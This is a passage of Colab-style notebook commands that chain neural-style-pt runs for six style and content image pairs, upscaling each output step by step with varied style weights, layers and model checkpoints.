!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 2 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/2A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 3 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/3A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 4 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/4A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_4.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-4.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 5 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/5A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input5.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/5A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style5' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_5.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-5.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 6 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/6A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style6' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input6.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/6A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/6A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
